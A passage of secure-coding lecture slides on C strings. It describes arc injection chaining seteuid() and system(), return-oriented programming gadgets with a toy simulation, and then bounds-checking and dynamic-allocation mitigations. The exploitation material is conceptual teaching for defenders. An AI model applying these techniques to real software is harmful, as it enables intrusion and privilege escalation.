get_buff() Returns 1-4
    4: ret instruction transfers control to seteuid()

seteuid() Returns 1-4
    1: seteuid() return transfers control to leave/return sequence
    4: ret instruction transfers control to system()

system() Returns 1-4
    1: system() returns control to leave/return sequence
    2: Original esp restored!
    3: Original ebp restored!
    4: ret instruction returns control to main()
Why is This Interesting?

An attacker can chain together multiple functions with arguments.
Exploit consists entirely of existing code
    No code is injected.
    Memory-based protection schemes cannot prevent arc injection.
    Larger overflows are not required.
The original frame can be restored to prevent detection.
Return-oriented Programming
The return-oriented programming exploit technique is similar to arc injection, but instead of returning to functions, the exploit code returns to sequences of instructions followed by a return instruction. Any such useful sequence of instructions is referred to as a gadget. A Turing-complete set of gadgets has been identified for the x86 architecture [Shacham 2007], allowing arbitrary programs to be written in the return-oriented language. A Turing-complete library of code gadgets using snippets of the Solaris libc, a general-purpose programming language, and a compiler for constructing return-oriented exploits has also been developed [Buchanan 2008]. Consequently, there is an assumed risk that return-oriented programming exploits could be effective on other architectures as well.
Gadgets
Gadgets form the programming language. Each gadget specifies certain values to be placed on the stack that make use of one or more sequences of instructions in the code segment. Gadgets perform well-defined operations, such as a load, an xor, or a jump. Return-oriented programming consists of putting gadgets together that will perform the desired operations. Gadgets are executed by a return instruction with the stack pointer referring to the address of the gadget.
Gadget: Immediate Constants

Instructions can encode constants:
  mov $0xdeadbeef, %ebx
Return-oriented equivalent:
  Store the constant on the stack.
  Pop it into a register to use: pop %ebx; ret
[Figure: eip steps through the ordinary instruction; esp steps through the stack, which holds the gadget address and the constant 0xdeadbeef.]
Gadget: Storing to Memory

The gadget movl %eax, 24(%edx); ret can be used to store the contents of %eax into memory. The address to be written is copied into %edx using the immediate constant gadget.
Because of the immediate offset in the movl instruction, the address in %edx must be 24 bytes less than the address we wish to write to.
[Figure: stack layout for the store gadget, drawn from low memory to high memory.]
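The way the immediate-constant and store gadgets combine can be modeled without touching a real stack. The following is a toy simulation only, under stated assumptions: the toy_cpu structure, the G_* gadget identifiers (standing in for gadget addresses), and toy_run_chain() are hypothetical names invented for illustration. It shows that the chain is driven purely by words on the stack and that the value loaded into %edx must be the target address minus 24.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy machine: two registers and a small byte-addressed memory. */
struct toy_cpu {
    uint32_t eax;
    uint32_t edx;
    uint8_t mem[64];
};

/* Hypothetical gadget identifiers standing in for gadget addresses. */
enum toy_gadget {
    G_POP_EAX,          /* models: pop %eax; ret */
    G_POP_EDX,          /* models: pop %edx; ret */
    G_STORE_EAX_24_EDX, /* models: movl %eax, 24(%edx); ret */
    G_HALT              /* stops the simulation */
};

/* Walks the stack the way a chain of ret instructions would.
 * Returns 0 when G_HALT is reached, -1 on a malformed chain. */
int toy_run_chain(struct toy_cpu *cpu, const uint32_t *stack, size_t words)
{
    size_t sp = 0; /* models esp as an index into stack[] */

    while (sp < words) {
        uint32_t gadget = stack[sp++]; /* "ret": fetch the next gadget */

        switch (gadget) {
        case G_POP_EAX:
            if (sp >= words) return -1;
            cpu->eax = stack[sp++]; /* constant was stored on the stack */
            break;
        case G_POP_EDX:
            if (sp >= words) return -1;
            cpu->edx = stack[sp++];
            break;
        case G_STORE_EAX_24_EDX: {
            uint64_t addr = (uint64_t)cpu->edx + 24; /* 24-byte displacement */
            if (addr + sizeof cpu->eax > sizeof cpu->mem) return -1;
            memcpy(&cpu->mem[addr], &cpu->eax, sizeof cpu->eax);
            break;
        }
        case G_HALT:
            return 0;
        default:
            return -1;
        }
    }
    return -1; /* ran off the end of the chain without halting */
}
```

To write 0xdeadbeef at toy address 32, a chain would be { G_POP_EAX, 0xdeadbeef, G_POP_EDX, 32 - 24, G_STORE_EAX_24_EDX, G_HALT }.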
Gadget: Unconditional Branch

Ordinary programming:
  set eip to new value (jmp +4)
Return-oriented equivalent:
  set esp to new value (pop %esp; ret)
Conditional branches are possible but trickier.
Iteration
An unconditional branch can be used to branch to an earlier gadget on the stack, resulting in an infinite loop. Conditional iteration can be implemented by a conditional branch out of the loop.
Return-oriented Programming
Shacham's paper contains a more complete tutorial on return-oriented programming [Shacham 2007]. While return-oriented programming might seem very complex, this complexity can be abstracted behind a programming language and compiler, making this a viable technique for writing exploits.
Mitigation Strategies
Include strategies designed to
  prevent buffer overflows from occurring
  detect buffer overflows and securely recover without allowing the failure to be exploited (e.g., stack canaries)
Input Validation
Buffer overflows are often the result of unbounded string or memory copies. Buffer overflows can be prevented by ensuring that input data does not exceed the size of the smallest buffer in which it is stored.
  int myfunc(const char *arg) {
    char buff[100];
    if (strlen(arg) >= sizeof(buff)) {
      abort();
    }
  }
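The length check can be packaged as a reusable helper. The following is a minimal sketch rather than the course's code: the name copy_validated() and its error-return convention (used here instead of abort()) are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Copies arg into buff only if it fits, including the null terminator.
 * Returns 0 on success and -1 if the input is missing or too long.
 * (Hypothetical helper; the slide's example calls abort() instead.) */
int copy_validated(char *buff, size_t buffsize, const char *arg)
{
    if (buff == NULL || arg == NULL || buffsize == 0) {
        return -1;
    }
    if (strlen(arg) >= buffsize) {
        return -1; /* input would not fit; reject instead of overflowing */
    }
    strcpy(buff, arg); /* safe: the length was validated above */
    return 0;
}
```

Returning an error lets the caller decide how to recover; whether to reject, abort, or truncate is a policy choice the application should make consistently.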
String Handling
The CERT C Secure Coding Standard recommendation "STR01-C. Adopt and implement a consistent plan for managing strings" advises selecting a single approach to handling character strings and applying it consistently across a project. Otherwise, the decision is left to individual programmers, who are likely to make different, inconsistent choices.
Memory Management Models

String handling functions can be categorized based on how they manage memory. There are three basic models:
  Caller allocates and frees (C99, OpenBSD, C1X Annex K)
  Callee allocates, caller frees (ISO/IEC TR 24731-2)
  Callee allocates and frees (C++ std::basic_string)
Memory Management Models

It could be argued whether the first model is more secure than the second model or vice versa.
  The first model makes it clearer when memory needs to be freed and is more likely to prevent leaks.
  The second model makes sure there is enough memory available (except when a call to malloc() fails).
The third memory management model, where the callee both allocates and frees storage, is the most secure of the three solutions but is only available in C++.
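The first two models can be contrasted with a small sketch in C. The function names greet_into() and greet_alloc() and the greeting text are hypothetical, chosen only to show who owns the buffer in each model; they are not part of any library discussed here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model 1: caller allocates and frees. The caller passes the buffer and
 * its size. Returns 0 on success, -1 if the result did not fit. */
int greet_into(char *buf, size_t size, const char *name)
{
    int n = snprintf(buf, size, "Hello, %s", name);
    return (n >= 0 && (size_t)n < size) ? 0 : -1;
}

/* Model 2: callee allocates, caller frees. The buffer is sized to fit;
 * the caller must pass the result to free(). Returns NULL if malloc() fails. */
char *greet_alloc(const char *name)
{
    size_t len = strlen("Hello, ") + strlen(name) + 1;
    char *s = malloc(len);
    if (s != NULL) {
        snprintf(s, len, "Hello, %s", name);
    }
    return s;
}
```

In the first model the caller can see at the call site which storage is involved; in the second the result always fits, but every call creates an obligation to free().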
Caller Allocates, Caller Frees

Caller allocates, caller frees is implemented by
  the C99 string handling functions defined in <string.h>
  the OpenBSD functions strlcpy() and strlcat()
  the C1X Annex K bounds-checking interfaces
Memory can be statically or dynamically allocated prior to invoking these functions, making this model optimally efficient.
Bounds-checking Interfaces
The bounds-checking interfaces are alternative library functions that promote safer, more secure programming.
The alternative functions verify that output buffers are large enough for the intended result and return a failure indicator if they are not.
Data is never written past the end of an array.
All string results are null terminated.
History
The C1X Annex K functions were created by Microsoft to help retrofit its existing legacy code base in response to numerous well-publicized security incidents over the past decade.
These functions were subsequently proposed for standardization to ISO/IEC JTC1/SC22/WG14, the international standardization working group for the programming language C.
These functions were published as ISO/IEC TR 24731-1 [ISO/IEC TR 24731-1:2007] and later incorporated in C1X in the form of a set of optional extensions specified in a normative annex.
Goals
Mitigate risk of
  buffer overrun attacks
  default protections associated with program-created files
Do not produce unterminated strings.
Do not unexpectedly truncate strings.
Preserve the null-terminated string data type.
Support compile-time checking.
Make failures obvious.
Have a uniform function signature.
Reading from stdin using gets_s()

  #define __STDC_WANT_LIB_EXT1__ 1
  #include <stdio.h>
  #include <stdlib.h>

  void get_y_or_n(void) {
    char response[8];
    size_t len = sizeof(response);
    printf("Continue? [y] n: ");
    gets_s(response, len);
    if (response[0] == 'n')
      exit(0);
  }

There is implementation-defined behavior (typically abort) if 8 characters or more are input.
This program is similar to the gets() example, except that the array bounds are checked.
Runtime-constraints
Most bounds-checked functions, upon detecting an error such as invalid arguments or not enough room in an output buffer, call a special runtime-constraint handler function. This function might print an error message and/or abort the program. The programmer can control which handler function is called via the set_constraint_handler_s() function, and can make the handler simply return if desired.
set_constraint_handler_s()
The set_constraint_handler_s() function sets the function (handler) called when a library function detects a runtime-constraint violation.
The behavior of the default handler is implementation-defined, and it may cause the program to exit or abort.
There are two predefined handlers (in addition to the default handler):
  abort_handler_s() writes a message on the standard error stream and then calls abort().
  ignore_handler_s() does not write to any stream. It simply returns to its caller.
Runtime-constraint Handler
If the handler simply returns, the function that invoked the handler indicates a failure to its caller using its return value.
Programs that install a handler that returns must check the return value of each call to any of the bounds-checking functions and handle errors appropriately.
The CERT C Secure Coding Standard recommendation "ERR03-C. Use runtime-constraint handlers when calling functions defined by TR24731-1" recommends installing a runtime-constraint handler to eliminate the implementation-defined behavior.
Reading from stdin using gets_s()

This example can be improved to remove the implementation-defined behavior at the cost of some additional complexity:
  int main(void) {
    constraint_handler_t oconstraint =
      set_constraint_handler_s(ignore_handler_s);
    get_y_or_n();
  }
In conformance with "ERR00-C. Adopt and implement a consistent and comprehensive error-handling policy," the constraint handler is set in main() for a consistent error-handling policy throughout the application.
Library functions may wish to avoid setting a specific constraint handler policy because this might conflict with the overall policy enforced by the application. In this case, library functions should assume that calls to bounds-checked functions will return and check the return status accordingly.
Bounds-checking Interfaces Summary

Implementations include
  a non-conforming version available in Microsoft Visual C++ 2005 and 2008
  the Dinkumware Compleat Library for gcc, EDG, and VC++
  the Open Watcom open source cross compiler
The ISO/IEC TR 24731-1 functions are not foolproof: they are still capable of overflowing a buffer if the maximum length of the destination buffer is incorrectly specified.
Because the C1X Annex K functions can often be used as simple replacements for the original library functions in legacy code, The CERT C Secure Coding Standard recommendation "STR07-C. Use TR 24731 for remediation of existing string manipulation code" recommends using them for this purpose on implementations that implement the Annex. (Such implementations are expected to define the __STDC_LIB_EXT1__ macro.)
Callee Allocates, Caller Frees

The second memory management model (callee allocates, caller frees) is implemented by the dynamic allocation functions defined by ISO/IEC TR 24731-2. ISO/IEC TR 24731-2 defines replacements for many of the standard C99 string handling functions that use dynamically allocated memory to ensure that buffer overflow does not occur.
Reading from stdin using getline()

  #define __STDC_WANT_LIB_EXT2__ 1
  #include <stdio.h>
  #include <stdlib.h>

  void get_y_or_n(void) {
    char *response = NULL;  /* Declares a pointer and not an array. */
    size_t size;
    printf("Continue? [y] n: ");
    if ((getline(&response, &size, stdin) < 0) ||
        (size && response[0] == 'n')) {
      free(response);
      exit(0);
    }
    free(response);
  }

The getline() function returns, through its arguments, a pointer to a dynamically allocated buffer and the allocated size.
The caller must free() the memory.
Dynamic Allocation Functions

Because the use of such functions requires introducing additional calls to free the buffers later, these functions are better suited to new developments than to retrofitting existing code.
In general, the functions described in ISO/IEC TR 24731-2 provide greater assurance that buffer overflow problems will not occur, because buffers are always automatically sized to hold the data required.
Applications that use dynamic memory allocation might, however, suffer from denial-of-service attacks where data is presented until memory is exhausted. They are also more prone to dynamic memory management errors, which can also result in vulnerabilities [Seacord 2005].
Copying and Concatenating Strings

  C99
  OpenBSD
  Bounds-checking Interfaces
  Dynamic Allocation Functions
C99
Not all uses of strcpy() are flawed. For example, it is often possible to dynamically allocate the required space:
  dest = (char *)malloc(strlen(source) + 1);
  if (dest) {
    strcpy(dest, source);
  } else {
    /* handle error */
    ...
  }
strlcpy() and strlcat()

Copy and concatenate strings in a less error-prone manner.
  size_t strlcpy(char *dst, const char *src, size_t size);
  size_t strlcat(char *dst, const char *src, size_t size);
The strlcpy() function copies the null-terminated string from src to dst (up to size characters).
The strlcat() function appends the null-terminated string src to the end of dst (no more than size characters will be in the destination).
Size Matters
To help prevent buffer overflows, strlcpy() and strlcat() accept the size of the destination string as an argument.
  For statically allocated destination buffers, this value is easily computed at compile time using the sizeof operator.
  Dynamic buffer size is not easily computed.
Both functions guarantee the destination string is null terminated for all non-zero-length buffers.
String Truncation
The strlcpy() and strlcat() functions return the total length of the string they tried to create.
  For strlcpy() that is simply the length of the source.
  For strlcat() it is the length of the destination (before concatenation) plus the length of the source.
To check for truncation, the programmer must verify that the return value is less than the size argument.
If the resulting string is truncated, the programmer
  knows the number of bytes needed to store the string
  may reallocate and recopy
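The truncation check can be sketched as follows. Because strlcpy() is not available on every platform, this sketch uses a stand-in, sketch_strlcpy(), written to follow the semantics described above; both that name and the wrapper copy_checked() are hypothetical, and the stand-in is an illustration rather than the OpenBSD implementation.

```c
#include <stddef.h>
#include <string.h>

/* Stand-in with strlcpy()-style semantics: copies at most size - 1
 * characters, always null terminates when size is nonzero, and returns
 * the length of src (the length of the string it tried to create). */
size_t sketch_strlcpy(char *dst, const char *src, size_t size)
{
    size_t srclen = strlen(src);

    if (size != 0) {
        size_t n = (srclen < size - 1) ? srclen : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;
}

/* Returns 0 if src was copied whole, -1 if it was truncated.
 * Truncation occurred when the return value is not less than size. */
int copy_checked(char *dst, size_t size, const char *src)
{
    return (sketch_strlcpy(dst, src, size) < size) ? 0 : -1;
}
```

On truncation, the value returned by the copy function plus one is the number of bytes a reallocated buffer would need.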
strlcpy() and strlcat() Summary

Available for several UNIX variants, including OpenBSD and Solaris. At the time of this course they were not available on GNU/Linux (glibc); glibc added them in version 2.38.
The incorrect use of these functions may still result in a buffer overflow if the specified buffer size is larger than the actual buffer size.
Truncation errors are also possible if the programmer fails to verify the results of these functions.
Bounds-checking Interfaces
Defines less error-prone versions of C standard functions:
  strcpy_s() instead of strcpy()
  strcat_s() instead of strcat()
  strncpy_s() instead of strncpy()
  strncat_s() instead of strncat()
strcpy_s() Function
Copies characters from a source string to a destination character array up to and including the terminating null character.
Has the signature
  errno_t strcpy_s(char * restrict s1, rsize_t s1max, const char * restrict s2);
Similar to strcpy() with an extra argument of type rsize_t that specifies the maximum length of the destination buffer.
Only succeeds when the source string can be fully copied to the destination without overflowing the destination buffer.
Runtime-constraints
Neither s1 nor s2 shall be a null pointer.
s1max shall not be > RSIZE_MAX.
s1max shall not equal zero.
s1max shall be > strnlen_s(s2, s1max).
Copying shall not take place between objects that overlap.
If there is a runtime-constraint violation, then if s1 is not a null pointer and s1max is greater than zero and not greater than RSIZE_MAX, then strcpy_s() sets s1[0] to the null character.
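These constraints can be illustrated on platforms that lack Annex K with a portable stand-in. The following is a sketch only: sketch_strcpy_s() and SKETCH_RSIZE_MAX are hypothetical names, the limit value is an assumption, the overlap test assumes a flat address space, and no runtime-constraint handler is called (the function just returns nonzero).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKETCH_RSIZE_MAX (SIZE_MAX >> 1) /* assumed limit, for illustration */

/* Returns 0 on success, -1 on a constraint violation. On a violation,
 * s1[0] is set to the null character when s1 and s1max are usable. */
int sketch_strcpy_s(char *s1, size_t s1max, const char *s2)
{
    size_t s2len = 0;
    uintptr_t d, s;

    /* s1 must be usable before anything can be written to it. */
    if (s1 == NULL || s1max == 0 || s1max > SKETCH_RSIZE_MAX)
        return -1;
    if (s2 == NULL)
        goto violation;

    /* Bounded length, in the manner of strnlen_s(s2, s1max). */
    while (s2len < s1max && s2[s2len] != '\0')
        s2len++;
    if (s2len >= s1max) /* requires s1max > strnlen_s(s2, s1max) */
        goto violation;

    /* Reject overlapping source and destination regions. */
    d = (uintptr_t)s1;
    s = (uintptr_t)s2;
    if (d < s + s2len + 1 && s < d + s1max)
        goto violation;

    memcpy(s1, s2, s2len + 1); /* includes the terminating null */
    return 0;

violation:
    s1[0] = '\0';
    return -1;
}
```

Note that a 16-character source fails against a 16-byte destination, because the terminating null character must also fit.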
strcpy_s() Example
  int main(int argc, char* argv[]) {
    char a[16];
    char b[16];
    char c[24];

    strcpy_s(a, sizeof(a), "0123456789abcdef");
    strcpy_s(b, sizeof(b), "0123456789abcdef");
    strcpy_s(c, sizeof(c), a);
    strcat_s(c, sizeof(c), b);
  }

strcpy_s() fails and generates a runtime-constraint error: the 16-character source string plus its null terminator does not fit in a 16-byte array.
Open Watcom strcpy_s()

  errno_t strcpy_s(char * restrict s1,
                   rsize_t s1max,
                   const char * restrict s2) {
    errno_t rc = -1;
    const char *msg;
    rsize_t s2len = strnlen_s(s2, s1max);

    // Verify runtime-constraints
    if (nullptr_msg(msg, s1) &&                 // s1 not NULL
        nullptr_msg(msg, s2) &&                 // s2 not NULL
        maxsize_msg(msg, s1max) &&              // s1max <= RSIZE_MAX
        zero_msg(msg, s1max) &&                 // s1max != 0
        a_gt_b_msg(msg, s2len, s1max - 1) &&    // s1max > strnlen_s(s2, s1max)
        overlap_msg(msg, s1, s1max, s2, s2len)  // s1 s2 no overlap
    ) {
      while (*s1++ = *s2++);
      rc = 0;
    } else {
      // Runtime-constraints violated, make dest string empty
      if ((s1 != NULL) && (s1max > 0) && lte_rsizmax(s1max)) {
        s1[0] = NULLCHAR;
      }
      // Now call the handler
      __rtct_fail(__func__, msg, NULL);
    }
    return (rc);
  }

  C99
  OpenBSD
  C1X Annex K Bounds-checking Interfaces
  Dynamic Allocation Functions
Dynamic Allocation Functions

TR 24731-2: Extensions to the C Library - Part II: Dynamic allocation functions
The strdup() function is derived from POSIX.
  strdup() returns a pointer to a new string, which is a duplicate of the argument
  the returned pointer can be passed to free()
The strndup() function is derived from POSIX.
  strndup() is equivalent to strdup() except that strndup() copies at most n plus one bytes into the newly allocated memory
  the newly created string is always properly terminated
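The behavior described for strndup() can be sketched with standard C only. The function sketch_strndup() below is a hypothetical stand-in written for illustration, not the POSIX or TR 24731-2 implementation; it copies at most n characters, always appends a null terminator, and returns storage the caller must free().

```c
#include <stdlib.h>
#include <string.h>

/* Duplicates at most n characters of s into newly allocated memory.
 * The result is always null terminated. Returns NULL if malloc() fails.
 * The caller owns the result and must pass it to free(). */
char *sketch_strndup(const char *s, size_t n)
{
    size_t len = 0;
    char *copy;

    /* Find the shorter of n and the length of s without reading past n. */
    while (len < n && s[len] != '\0')
        len++;

    copy = malloc(len + 1); /* at most n plus one bytes */
    if (copy != NULL) {
        memcpy(copy, s, len);
        copy[len] = '\0';
    }
    return copy;
}
```

Because the buffer is sized from the data, there is no destination size for the caller to get wrong; the remaining obligations are checking for NULL and calling free().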
std::basic_string
The basic_string class is less prone to security vulnerabilities than null-terminated byte strings. However, some mistakes are still common:
  using an invalidated or uninitialized iterator
  passing an out-of-bounds index
  using an iterator range that really isn't a range
  passing an invalid iterator position
  using an invalid ordering
Checked STL Implementation

Most checked standard template library (STL) implementations detect common errors automatically. Use a checked STL implementation (even if only used restrictively). At a minimum, run on a single platform during prerelease testing using your full complement of tests.
Beyond basic_string
std::basic_string is implemented in various ways on different platforms and is consequently subject to different types of problems depending on
  threading model
  use of reference counting
  etc.
Andrei Alexandrescu's flex_string is a drop-in replacement for std::basic_string.
  Policy-based design allows the user to specify to a large degree how it's implemented.
  Most local character buffers could be more efficiently implemented with a version of flex_string that uses the small-string optimization.
String Summary
Buffer overflows occur frequently in C and C++ because these languages
  use null-terminated byte strings
  do not perform implicit bounds checking
  provide standard library calls for strings that do not enforce bounds checking
The basic_string class is less error prone for C++ programs.
String functions defined by ISO/IEC TR 24731-1 are useful for legacy system remediation.
New C language development might consider using dynamic allocation functions or other managed string libraries.
Secure Coding Rules

STR31-C. Guarantee that storage for strings has sufficient space for character data and the null terminator
STR32-C. Null-terminate byte strings as required
STR33-C. Size wide character strings correctly
STR34-C. Cast characters to unsigned types before converting to larger integer sizes
STR35-C. Do not copy data from an unbounded source to a fixed-length array
Secure Coding Recommendations

MSC00-C. Compile cleanly at high warning levels
STR00-C. Represent characters using an appropriate type
STR01-C. Adopt and implement a consistent plan for managing strings
STR02-C. Sanitize data passed to complex subsystems
STR03-C. Do not inadvertently truncate a null-terminated byte string
STR04-C. Use plain char for characters in the basic character set
STR07-C. Use TR 24731 for remediation of existing string manipulation code
STR08-C. Use managed strings for development of new string manipulation code
References
[Buchanan 2008] Erik Buchanan, Ryan Roemer, Hovav Shacham, and Stefan Savage. 2008. When good instructions go bad: generalizing return-oriented programming to RISC. In Proceedings of the 15th ACM conference on Computer and communications security (CCS '08). ACM, New York, NY, USA, 27-38. DOI=10.1145/1455770.1455776 http://doi.acm.org/10.1145/1455770.1455776
[Shacham 2007] Hovav Shacham. The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86). In Proceedings of CCS 2007, ACM Press.
Questions about Strings
